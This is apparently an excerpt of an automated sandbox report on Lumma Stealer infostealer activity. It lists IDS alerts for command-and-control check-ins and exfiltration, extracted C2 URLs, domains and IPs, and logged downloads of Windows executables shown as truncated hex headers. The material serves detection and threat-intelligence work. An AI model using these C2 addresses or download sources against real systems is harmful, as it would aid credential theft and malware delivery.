Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50010 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50010 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50040 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50092 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50090 -> 188.114.96.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 33
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:24:20 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 f0 41 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6c 6a 72 69 61 70 70 00 e0 2b 00 00 a0 00 00 00 de 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 75 64 74 61 76 67 74 00 20 00 00 00 80 2c 00 00 04 00 00 00 18 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:24:27 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 20 f0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 71 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 71 64 64 65 7a 74 67 00 b0 19 00 00 d0 30 00 00 a4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 7a 65 6c 72 63 79 76 00 10 00 00 00 80 4a 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:09 GMTContent-Type: application/octet-streamContent-Length: 2994688Last-Modified: Wed, 30 Oct 2024 04:12:46 GMTConnection: keep-aliveETag: "6721b23e-2db200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 c0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 30 00 00 04 00 00 c9 55 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 70 6d 6d 6a 6b 75 70 00 00 2b 00 00 b0 05 00 00 f8 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 76 66 72 68 6b 66 74 00 10 00 00 00 b0 30 00 00 04 00 00 00 8c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 30 00 00 22 00 00 00 90 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:20 GMTContent-Type: application/octet-streamContent-Length: 2145792Last-Modified: Wed, 30 Oct 2024 04:12:59 GMTConnection: keep-aliveETag: "6721b24b-20be00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 00 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 73 00 00 04 00 00 de 66 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 70 78 6e 7a 69 70 78 00 10 1a 00 00 e0 58 00 00 0c 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 74 67 72 62 66 61 71 00 10 00 00 00 f0 72 00 00 06 00 00 00 96 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 73 00 00 22 00 00 00 9c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:30 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 30 Oct 2024 03:11:49 GMTConnection: keep-aliveETag: "6721a3f5-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed a3 21 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 c3 0d 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:34 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 f0 41 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6c 6a 72 69 61 70 70 00 e0 2b 00 00 a0 00 00 00 de 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 75 64 74 61 76 67 74 00 20 00 00 00 80 2c 00 00 04 00 00 00 18 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:38 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 